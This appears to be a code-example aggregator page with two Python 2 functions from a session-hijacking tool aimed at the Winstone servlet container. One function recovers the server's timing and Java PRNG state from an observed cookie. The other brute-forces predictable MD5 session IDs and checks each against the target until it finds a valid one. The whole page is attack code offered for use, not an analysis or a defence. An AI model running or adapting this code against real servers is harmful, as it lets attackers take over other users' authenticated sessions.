Ejemplo n.º 1
0
def hijackSession(url,IPAddr,serverPort,sessionsFileName,success_str):
    f = open(sessionsFileName,"r")
    while True:
        line = f.readline().replace("\n","")
        if line == "":
            break

        (cookieName,timeMillisMin,timeMillisMax,PRNGseed,sessionCnt) = line.split(",")

        timeMillisMin = int(timeMillisMin)
        timeMillisMax = int(timeMillisMax)
        PRNGseed = int(PRNGseed)
        sessionCnt = int(sessionCnt)
        
        seek = 1
        for tryMillis in range(timeMillisMin,timeMillisMax):
            if seek > sessionCnt:
                break

            g = JavaLCGMimic(0)
            g.forceSeed(PRNGseed)
            for i in range(seek):
                PRNGout = g.nextLong()

            md5dig = hashlib.md5()
            md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(tryMillis)+str(PRNGout))

            cookieToTry = md5dig.hexdigest()

            if isCookieValid(url,cookieName+"="+cookieToTry,success_str):
                print "[!!!] Found valid cookie:",cookieName+"="+cookieToTry
                seek += 1
Ejemplo n.º 2
0
def syncMillisAndPRNG(url,PRNGseed,IPAddr,serverPort,timezone):
        global CookieName
        global PRNGseekMax
        global timeMillisDelay
        
        t = givemecookie(url)

        if t == None:

            return

        cookie = t[0].split('=')[-1]
        st = time.strptime(t[-1], '%a, %d %b %Y %H:%M:%S %Z')
        dt = datetime.fromtimestamp(time.mktime(st))
        dt = dt.replace(tzinfo=pytz.utc).astimezone(pytz.timezone(timezone))
        
        timeSecs = int(time.mktime(dt.timetuple()))

        PRNGseek = 1
        while True:
            if PRNGseek > PRNGseekMax:
                break

            g = JavaLCGMimic(0)
            g.forceSeed(PRNGseed)
            
            PRNGout = -1
            for s in range(PRNGseek):
                PRNGout = g.nextLong()

            for timeMillis in range((timeSecs*1000)-timeMillisDelay,(timeSecs*1000)+1000):
                md5dig = hashlib.md5()
                md5dig.update("Winstone_"+IPAddr+"_"+serverPort+"_"+str(timeMillis)+str(PRNGout))
                
                if md5dig.hexdigest() == cookie:
                    print "[.] Parameters found:","timeMillis =",timeMillis,"Seek =",PRNGseek
                    return (timeMillis,g.seed,PRNGseek)

            PRNGseek += 1